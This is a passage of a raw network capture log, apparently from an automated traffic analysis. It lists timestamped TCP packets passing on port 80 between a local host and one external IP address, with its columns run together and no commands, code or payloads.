                                                                                                                                                                      Aug 23, 2022 18:26:09.883985043 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884022951 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884035110 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884038925 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884540081 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884565115 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884581089 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884598970 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884613991 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884617090 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884619951 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884632111 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884635925 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884654999 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884659052 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884690046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884706974 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884723902 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884726048 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884736061 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884754896 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884788036 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884799957 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884804964 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884833097 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884851933 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884871960 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884877920 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884891987 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884911060 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884932995 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884938002 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.884953022 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884970903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884988070 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.884995937 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.885000944 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.885008097 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.885010958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.885025978 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.885051966 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.885056973 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.885416985 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886192083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886219025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886231899 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886245012 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886257887 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886275053 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886286974 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886323929 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886328936 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886344910 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886367083 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886370897 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886410952 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886436939 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886524916 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886545897 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886568069 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886590004 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886590958 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886596918 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886624098 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886630058 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886637926 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886650085 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886670113 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886682034 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.886723995 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.886733055 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911119938 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911155939 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911170959 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911189079 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911205053 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911207914 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911227942 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911238909 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911247015 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911247969 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911267996 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911286116 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911289930 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911300898 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911303997 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911322117 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911339045 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911364079 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911379099 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911397934 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911415100 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911433935 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911443949 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911453009 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911456108 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911514044 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911515951 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911521912 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911606073 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911648035 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911653996 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911663055 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911679029 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.911724091 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.911740065 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.912744999 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.912779093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.912854910 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.912873983 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.914757013 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.914788008 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.914805889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.914866924 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.914871931 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.914882898 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.914895058 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.914912939 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.914956093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.914958000 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.914967060 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915000916 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.915004015 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915011883 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915019989 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.915080070 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915086985 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.915088892 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915122986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.915169954 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.915189981 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.915215015 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.915234089 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.915246964 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915251970 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.915268898 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.915329933 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915371895 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915376902 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915380001 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915390015 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.915393114 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.916734934 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.916771889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.916795015 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.916816950 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.916876078 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.916881084 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.916881084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.916903973 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.916923046 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.916934967 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.916964054 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.916973114 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.916984081 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.916996956 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917023897 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917052031 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917058945 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917073965 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917134047 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917169094 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917190075 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917205095 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917213917 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917217970 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917249918 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917251110 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917283058 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917299986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917304993 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917319059 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917337894 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917366028 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917371035 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917392015 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917409897 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917417049 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917454004 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917470932 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917489052 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917490005 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917495966 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917526007 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917550087 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917558908 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917587042 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917593002 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917613029 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917649984 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917655945 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.917669058 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.917717934 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.946983099 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947012901 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947030067 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947046995 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947065115 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947082043 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947099924 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947101116 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.947118998 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947139025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947160959 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.947180033 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.947448969 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947469950 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947503090 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947555065 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947570086 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.947575092 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947592020 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947642088 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.947654009 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.947673082 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.947834015 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947899103 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.947932005 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947952986 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.947966099 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.948035955 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.948683023 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.948712111 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.948728085 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.948761940 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.949011087 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.949151993 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949173927 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949191093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949225903 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949249029 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949266911 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949311018 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.949320078 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.949491024 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949512959 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949529886 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949543953 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949557066 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949577093 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949614048 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.949630976 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949640036 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.949642897 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.949656010 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949673891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949744940 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.949887991 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949912071 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.949928999 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950045109 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950066090 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950098038 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.950108051 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950176001 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.950181007 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.950186968 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950206995 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950223923 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950308084 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950329065 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950347900 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950355053 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.950401068 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.950409889 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.950412989 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.950867891 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950895071 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950911999 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.950969934 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.950994015 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.951035023 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951054096 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951071978 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951101065 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.951133013 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.951308966 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951329947 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951395035 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951409101 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.951452017 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.951458931 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.951472044 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951493025 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951510906 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951539993 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.951567888 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.951572895 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.951735973 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951778889 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951798916 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951817989 CEST804980045.95.11.158192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:09.951847076 CEST4980080192.168.2.645.95.11.158
                                                                                                                                                                      Aug 23, 2022 18:26:09.951879978 CEST4980080192.168.2.645.95.11.158
